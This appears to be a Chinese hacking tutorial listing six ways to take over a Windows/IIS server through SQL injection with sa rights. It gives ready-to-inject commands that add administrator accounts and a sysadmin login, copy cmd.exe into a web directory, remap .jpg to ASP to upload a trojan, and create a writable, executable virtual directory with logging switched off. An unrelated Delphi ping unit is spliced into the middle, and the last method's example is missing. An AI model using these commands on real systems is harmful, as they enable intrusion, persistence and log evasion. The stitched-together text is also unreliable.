
调用icmp.dll实现Ping功能

mssql injection之sa的利用

数据库和网站放在同一台服务器上(以下各方法均以此为前提,并且要求注入点是以 sa 或其他 sysadmin 权限执行的;凡是用 xp_cmdshell 的步骤,实际执行权限取决于 SQL Server 服务账户):


方法一:


  通过 sysocmgr 用应答文件开启终端服务(TS),再添加一个管理员账户,具体语句如下(注意:SQL Server 2005 起 xp_cmdshell 默认是关闭的,需要 sysadmin 用 sp_configure 打开才能用):


;exec master.dbo.xp_cmdshell '@echo [Components] > c:\sql'
;exec master.dbo.xp_cmdshell '@echo TSEnable = on >> c:\sql'
;exec master.dbo.xp_cmdshell '@sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q'
;exec master.dbo.xp_cmdshell '@del C:\server'


Exec Master..Xp_CmdShell 'net user linzi 123 /add'


Exec Master..Xp_CmdShell 'net localgroup administrators linzi /add'


方法二:
(注:此处插入的是另一篇文章的 Delphi 代码——调用 icmp.dll 实现 Ping 功能,与本文的注入利用无关;“方法二”的正文在这段代码之后继续。)

unit PingUnit;
interface
uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  ExtCtrls, StdCtrls,winsock;
type
PIPOptionInformation = ^TIPOptionInformation;
{ Per-request IP options handed to IcmpSendEcho.  Field order is intended to
  match the Win32 IP_OPTION_INFORMATION struct.  This unit only ever sets TTL
  (see exebuttonClick); the rest is zero-filled. }
TIPOptionInformation = packed  record
TTL: Byte;           // time-to-live for the outgoing echo request
TOS: Byte;           // type of service
Flags: Byte;         // IP header flags
OptionsSize: Byte;   // size of the option block at OptionsData
OptionsData: PChar;  // IP options; left nil by this unit
end;

PIcmpEchoReply = ^TIcmpEchoReply;
{ One reply record as filled in by IcmpSendEcho at the start of the caller's
  reply buffer.  Field order is intended to match the Win32 ICMP_ECHO_REPLY
  struct.
  NOTE(review): 'packed' reproduces the 32-bit layout; on Win64 the pointer
  members (Data, OptionsData) are naturally 8-byte aligned, so this record
  would no longer match the API struct — confirm before building for x64. }
TIcmpEchoReply = packed record
Address: DWORD;    // address that replied
Status: DWORD;     // IP status code of the reply (0 is success per the API docs)
RTT: DWORD;        // round-trip time, shown by the UI as milliseconds
DataSize: Word;    // number of reply data bytes
Reserved: Word;
Data: Pointer;     // reply data; the unit assigns a scratch buffer here but never reads it back
Options: TIPOptionInformation;
 end;
{ Prototypes of the three icmp.dll exports resolved with GetProcAddress in
  TPingForm.FormCreate.  All are stdcall, as the Win32 API requires. }
TIcmpCreateFile = function: THandle; stdcall;
TIcmpCloseHandle = function(IcmpHandle: THandle): Boolean; stdcall;
TIcmpSendEcho = function(IcmpHandle:THandle;
DestinationAddress: DWORD;
RequestData: Pointer;
RequestSize: Word;
RequestOptions: PIPOptionInformation;
ReplyBuffer: Pointer;
ReplySize: DWord;
Timeout: DWord
): DWord; stdcall;
 TPingForm = class(TForm)
    StatusShow: TMemo;      // output: header line plus one line per successful echo reply
    Panel1: TPanel;
    pingedit: TEdit;        // input: the address to ping, parsed with inet_addr (dotted decimal)
    exebutton: TButton;     // sends one echo request to the address in pingedit
    procedure FormCreate(Sender: TObject);     // initialises Winsock, binds icmp.dll, opens hICMP
    procedure exebuttonClick(Sender: TObject); // one IcmpSendEcho round trip, result appended to StatusShow
  private
    { Private declarations }

 hICMP: THANDLE;   // handle returned by IcmpCreateFile. NOTE(review): never closed — there is no FormDestroy calling IcmpCloseHandle
 IcmpCreateFile : TIcmpCreateFile;   // icmp.dll entry points bound by GetProcAddress in FormCreate
 IcmpCloseHandle: TIcmpCloseHandle;  // bound but never called by this unit
 IcmpSendEcho: TIcmpSendEcho;
  public
    { Public declarations }
  end;

var
  PingForm: TPingForm;   // global instance of the form declared above (creation happens outside this unit)

implementation

{$R *.DFM}

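procedure TPingForm.FormCreate(Sender: TObject);
{ Initialises Winsock, binds the three icmp.dll entry points used by
  exebuttonClick and opens the ICMP handle.

  Fixes over the original: the string literals used typographic quotes and
  did not compile; the results of WSAStartup, LoadLibrary, GetProcAddress and
  IcmpCreateFile were never checked, so a missing DLL turned into a nil call;
  and icmp.dll was loaded by bare name, i.e. through the DLL search order
  (application directory first), which is the classic DLL-planting vector.

  On any failure the function-pointer fields stay nil and hICMP stays
  INVALID_HANDLE_VALUE; exebuttonClick must test those before use.
  The module handle is deliberately not freed and WSACleanup is not called:
  the bindings are needed for the lifetime of the form and there is no
  FormDestroy in this unit (same as the original). }
 var
  WSAData: TWSAData;
  hICMPdll: HMODULE;
  SysDir: array[0..MAX_PATH] of Char;
  DllPath: string;
 begin
   hICMP := INVALID_HANDLE_VALUE;
   IcmpCreateFile := nil;
   IcmpCloseHandle := nil;
   IcmpSendEcho := nil;

   { UI setup first so the memo is usable even when the ICMP setup below fails. }
   StatusShow.Text := '';
   statusshow.Align := alclient;
   StatusShow.Lines.Add('目的IP地址 字节数 返回时间(毫秒)');

   { WSAStartup returns 0 on success; the Winsock docs require it before inet_addr. }
   if wsastartup($101, WSAData) <> 0 then
   begin
     MessageDlg('初始化 Winsock 失败!', mtError, [mbOK], 0);
     Exit;
   end;

   { Load by absolute System32 path instead of the bare name 'icmp.dll' so a
     planted DLL next to the executable cannot be picked up first.  Falls back
     to the original bare-name behaviour only if the system directory cannot
     be determined. }
   if GetSystemDirectory(SysDir, MAX_PATH) = 0 then
     DllPath := 'icmp.dll'
   else
     DllPath := StrPas(SysDir) + '\icmp.dll';
   hICMPdll := LoadLibrary(PChar(DllPath));
   if hICMPdll = 0 then
   begin
     MessageDlg('加载 icmp.dll 失败!', mtError, [mbOK], 0);
     Exit;
   end;

   @IcmpCreateFile := GetProcAddress(hICMPdll, 'IcmpCreateFile');
   @IcmpCloseHandle := GetProcAddress(hICMPdll, 'IcmpCloseHandle');
   @IcmpSendEcho := GetProcAddress(hICMPdll, 'IcmpSendEcho');
   if not (Assigned(IcmpCreateFile) and Assigned(IcmpCloseHandle) and Assigned(IcmpSendEcho)) then
   begin
     { Leave nothing half-bound: a partially usable set would let exebuttonClick
       call through a nil pointer. }
     IcmpCreateFile := nil;
     IcmpCloseHandle := nil;
     IcmpSendEcho := nil;
     MessageDlg('在 icmp.dll 中找不到 Icmp* 函数!', mtError, [mbOK], 0);
     Exit;
   end;

   { IcmpCreateFile returns INVALID_HANDLE_VALUE on failure. }
   hICMP := IcmpCreateFile;
   if hICMP = INVALID_HANDLE_VALUE then
     MessageDlg('IcmpCreateFile 失败!', mtError, [mbOK], 0);
 end;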


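procedure TPingForm.exebuttonClick(Sender: TObject);
{ Sends one ICMP echo request ("Hello,World" payload, TTL 64) to the address
  typed into PingEdit and appends "<ip>  <bytes>  <rtt>" to StatusShow, or
  shows a dialog when no good reply arrived.  Blocks the UI thread for up to
  FTimeOut (4000 ms) while waiting — same as the original.

  Fixes over the original: the string literals used typographic quotes and
  '〈〉' instead of '<>' and did not compile; the return value of IcmpSendEcho
  (number of replies) was ignored and success was instead judged by
  dereferencing Options.OptionsData, which the API leaves nil, so the code
  only "worked" because the resulting access violation was swallowed by the
  except block; inet_addr's INADDR_NONE result was not checked, so a hostname
  or garbage was pinged as 255.255.255.255; the reply buffer was freed outside
  try/finally; and the unit checked nothing if FormCreate had failed to bind
  icmp.dll. }
 const
   IP_SUCCESS = 0;   // ICMP_ECHO_REPLY.Status value of a good reply (Win32 ipexport.h)
 var
   IPOpt: TIPOptionInformation;   // IP options for the packet to send; only TTL is set
   FIPAddress: DWORD;
   pReqData: PChar;
   pIPE: PIcmpEchoReply;          // ICMP echo reply buffer
   FSize: DWORD;
   MyString: string;
   FTimeOut: DWORD;
   BufferSize: DWORD;
   Replies: DWORD;
 begin
   if PingEdit.Text = '' then
     Exit;

   { FormCreate leaves hICMP = INVALID_HANDLE_VALUE and/or nil entry points when
     icmp.dll could not be bound; calling through them would crash. }
   if (hICMP = INVALID_HANDLE_VALUE) or not Assigned(IcmpSendEcho) then
   begin
     MessageDlg('ICMP 尚未初始化!', mtError, [mbOK], 0);
     Exit;
   end;

   { Only dotted-decimal input is accepted: inet_addr returns INADDR_NONE
     ($FFFFFFFF) for anything else, which would otherwise be sent to the
     limited-broadcast address 255.255.255.255. }
   FIPAddress := inet_addr(PChar(PingEdit.Text));
   if FIPAddress = INADDR_NONE then
   begin
     MessageDlg('IP地址格式不正确!', mtInformation, [mbOK], 0);
     Exit;
   end;

   MyString := 'Hello,World';
   pReqData := PChar(MyString);
   FSize := 40;
   { The reply buffer must hold the reply record plus the echoed payload plus
     room for an ICMP error (the API docs ask for payload + 8 bytes); 40 bytes
     covers the 11-byte payload with margin.  The API writes the echoed data
     into this same buffer, so no separate receive buffer is needed. }
   BufferSize := SizeOf(TIcmpEchoReply) + FSize;
   GetMem(pIPE, BufferSize);
   try
     FillChar(pIPE^, BufferSize, 0);
     FillChar(IPOpt, SizeOf(IPOpt), 0);
     IPOpt.TTL := 64;
     FTimeOut := 4000;

     { Return value is the number of ICMP_ECHO_REPLY records stored in pIPE;
       0 means timeout or error.  Status must additionally be IP_SUCCESS,
       since e.g. "destination unreachable" also produces a reply record. }
     Replies := IcmpSendEcho(hICMP, FIPAddress, pReqData, Length(MyString), @IPOpt, pIPE, BufferSize, FTimeOut);
     if (Replies > 0) and (pIPE^.Status = IP_SUCCESS) then
       StatusShow.Lines.Add(PingEdit.Text + '      ' + IntToStr(pIPE^.DataSize) + '      ' + IntToStr(pIPE^.RTT))
     else
       MessageDlg('没有找到该IP地址!', mtInformation, [mbOK], 0);
   finally
     FreeMem(pIPE);
   end;
 end;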
end.  

让 IIS 用 asp.dll 去解析 .jpg 扩展名,然后通过网站已有的上传点“合法地”上传一个扩展名为 .jpg、内容为 ASP 木马的文件,主要是利用 Adsutil.vbs


这个脚本来实现。改脚本映射需要能写 IIS metabase 的管理员权限(xp_cmdshell 是以 SQL Server 服务账户身份执行的,服务账户不是本地管理员/SYSTEM 时此法无效);防御上应定期核对各站点的 ScriptMaps,看是否有 .jpg 之类的非脚本扩展名被映射到了 asp.dll。


具体语句是:
cscript C:\Inetpub\AdminScripts\adsutil.vbs ENUM w3svc/3/root 得到其目录(Path 等属性)
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/3/Root/ScriptMaps ".jpg,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"


方法三:


新建一个属于 sysadmin 服务器角色的 SQL 登录(下面语句加的是 SQL 登录,不是操作系统账户),然后用查询分析器直接连上去(前提是 SQL Server 的端口,默认 1433,能从外部直连;这也是为什么数据库端口不应暴露到公网)


具体语句:


;exec master.dbo.sp_addlogin linzi;--


;exec master.dbo.sp_password null,linzi,linzi;--


;exec master.dbo.sp_addsrvrolemember linzi,sysadmin;--


方法四:


老洞新用:把 cmd.exe 复制到 IIS 的 scripts 可执行目录里,人为构造出和早年 IIS Unicode 漏洞(“U漏洞”)等价的命令执行入口,然后用小金写的工具连接上去,实现上传


具体语句如下:


;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\linzi.exe'


方法五:


利用 Adsutil.vbs 建一个有目录浏览、写、执行等权限的虚拟目录,然后实现上传(注意下面把 Path 指到了 c:\ 根目录,等于把整块 C 盘经 HTTP 开放为可读、可写、可执行)


具体语句如下:


cscript c:\Inetpub\AdminScripts\adsutil.vbs CREATE W3SVC/1/Root/linzi "IIsWebVirtualDir"
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AppIsolated 0
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/Path "c:\"
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessExecute 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSource 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessRead 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessScript 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessWrite 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/ScriptMaps ".asp,c:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/DontLog 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDirBrowsing 1
cscript c:\Inetpub\AdminScripts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDefaultDoc 0


然后访问 http://ip/linzi/ 即可进入。注意其中 DontLog 1 关掉了该虚拟目录的访问日志,所以 IIS 日志里看不到这些请求;防御侧应当监控 metabase 变更(新增虚拟目录、Path 指向盘符根目录、DontLog 被置 1)而不是只看访问日志。


方法六:


爆出网站的物理路径,然后直接写入一个小马,或者先上传一张内容为木马的图片,再用 copy 命令把它复制成 .asp 扩展名


具体语句如下(原文此处的示例语句在本页已缺失):
